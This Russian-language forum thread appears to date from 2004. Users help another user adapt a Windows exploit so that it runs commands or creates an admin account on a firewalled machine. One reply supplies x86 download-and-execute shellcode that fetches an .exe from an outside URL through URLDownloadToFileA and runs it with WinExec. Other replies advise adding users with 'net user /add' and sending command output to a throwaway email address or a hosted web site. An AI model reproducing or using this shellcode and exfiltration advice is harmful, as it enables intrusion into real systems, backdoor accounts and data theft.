Не знаю не знаю. В bochs-е дизасм весит 97 кило :-) [upd]05.01.04 23:56 Число просмотров: 2063 Автор: amirul <Serge> Статус: The Elderman Отредактировано 06.01.04 00:00 Количество правок: 1
Дайте инфу или подскажите каким образом надо модифицировать код эксплоита который даёт шелл, таким образом чтоб он выполнил несколько команд баз открытия порта!
Есть проги которые помогают создать шеллкод?05.01.04 18:12 Автор: SpAuT Статус: Незарегистрированный пользователь
> Дайте инфу или подскажите каким образом надо модифицировать > код эксплоита который даёт шелл, таким образом чтоб он > выполнил несколько команд баз открытия порта! Есть проги которые помогают создать шеллкод?
Ага05.01.04 21:12 Автор: amirul <Serge> Статус: The Elderman
Надо написать прогу на си (или можно на си++) , компилить тока под виндами ( если это переделать
#include <stdio.h>
main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
на это
#include <stdio.h>
main()
{
char *shell[2];
shell[0] = "c:\windows\system32\cmd.exe";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
Какой самый маленький дизассемблер ( по размеру файла)?
ну ты даешь...06.01.04 05:09 Автор: DgtlScrm Статус: Member Отредактировано 06.01.04 05:12 Количество правок: 1
на переносимость я так полагаю ты не рассчитываешь? Как знаешь... но тогда лудше всеравно пиши на асме:
xor ebx, ebx;
add dh, 0xff;
// app name: http://www.ietest1.by.ru/fooware.exe
mov dword ptr[edx-0x28],0x70747468;// save "http"
mov dword ptr[edx-0x24],0x772f2f3a; // save "://w"
mov dword ptr[edx-0x20],0x692e7777;// save "ww.i"
mov dword ptr[edx-0x1c],0x73657465;// save "etes"
mov dword ptr[edx-0x18],0x622e3174;// save "t1.b"
mov dword ptr[edx-0x14],0x75722e79;// save "y.ru"
mov dword ptr[edx-0x10],0x6f6f662f; // save "/foo"
mov dword ptr[edx-0x0c],0x65726177;// save "ware"
mov dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov dword ptr[edx-0x04],ebx;// fill with \x00 on the end
lea eax, [edx-0x28];
add dh, 0xff
mov dword ptr[edx-0x0c],0x785c3a63;// save "c:\X" (file to download)
mov dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov dword ptr[edx-0x04],ebx;// fill with \x00 on the end
lea ecx, [edx-0x0c];// move ecx addr of string (file name)
pop ebx; //set ebx to URLDownloadToFileA entry point
push edx
xor edx,edxset edx to zero
push edx
push edx
push ecx
push eax
push edx
call ebx
pop edx; // restore str addr
// Execute downloaded file:
pop eax; // get WinExec address
xor ebx,ebx
add dh, 0xff
mov dword ptr[edx-0x0c],0x785c3a63;// save "c:\X" (file to download)
mov dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov dword ptr[edx-0x04],ebx;// fill with \x00 on the end
lea ecx, [edx-0x0c];// move ecx addr of string (file name)
push 0x01
push ecx
call eax
---
А адреса URLDownloadToFile и WinExec ищи как хочешь, уже не маленький :)
(извеняюсь за такой некрасивый код, просто я его выдрал с одного из своих первых спроитов %) )
А ты хотел в килобайтах? Нормальный сплоит поменьше сотни байт это однозначно :)
Этот пример закачивает и запускает. Кстати нащет дизассемблера - это был прикол такой??? Если нет, то сначала немного почитай... (не прийми это как обиду, это просто совет... я когда-тоже такой был :) а наверное таким и остался :) )
неплохая имхо инфа по написанию шеллкодов06.01.04 11:05 Автор: vladik_ Статус: Незарегистрированный пользователь Отредактировано 06.01.04 11:05 Количество правок: 1
Не знаю как насчет малой. Но W32Dasm когда надо просто глянуть дизасм проги у которой нет никаких вы?бонов против дизасма - имхо самое то. Занимает он у меня 1.4мб
Не знаю не знаю. В bochs-е дизасм весит 97 кило :-) [upd]05.01.04 23:56 Автор: amirul <Serge> Статус: The Elderman Отредактировано 06.01.04 00:00 Количество правок: 1
> Короче на машине стоит файрволл (win2k) и надо чтоб сплоит > создал пользавотеля с правами админа!Не открывая шелл!
почитай MSDN о том как создать пользователя. Я так понимаю ты работаешь с переносимым шеллкодом??? Вот и найди все необходимые функции, которые тебе понадобятся, вычили шеллкодом их адреса и исполняй. Только если машина удаленная и вдобавок фаервол, то созданный пользователь тебе не пригодится. Лудше организуй систему исполнения комманд, а результаты работы высылай на левое мыло... или если даже SMTP заблокирован, то создай на H1.RU сайтец и через веб сабмить все данные туда.
Но закон не дремлет :) Хотя и ответственность у нас не такая уж и высокая :)
Дополнение05.01.04 11:21 Автор: amirul <Serge> Статус: The Elderman
> почитай MSDN о том как создать пользователя. Я так понимаю > ты работаешь с переносимым шеллкодом??? Вот и найди все > необходимые функции, которые тебе понадобятся, вычили > шеллкодом их адреса и исполняй. Только если машина Можно даже и без этого обойтись. Просто вместо "cmd.exe" в самом конце сплойта запускать "net user /add"
> удаленная и вдобавок фаервол, то созданный пользователь > тебе не пригодится. Лудше организуй систему исполнения > комманд, а результаты работы высылай на левое мыло... или > если даже SMTP заблокирован, то создай на H1.RU сайтец и > через веб сабмить все данные туда. > > Но закон не дремлет :) Хотя и ответственность у нас не > такая уж и высокая :) Во всем остальном полностью согласен
> Дайте инфу или подскажите каким образом надо модифицировать > код эксплоита который даёт шелл, таким образом чтоб он > выполнил несколько команд баз открытия порта! Обычно делается ShellExecute с "open"-ом для cmd.exe или CreateProcess с путем к файлу cmd.exe.
Причем до этого должны находиться всякие заморочки, которые инициализируют винсок, открывают сокет и перенаправляют ввод/вывод создаваемого процесса в этот сокет. Тебе просто надо поудалять эти вещи и поклонировать части с созданием процесса для других команд.
Можно чуть внятнее - что ты не хочешь открывать? :)04.01.04 15:46 Автор: Ktirf <Æ Rusakov> Статус: Elderman
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
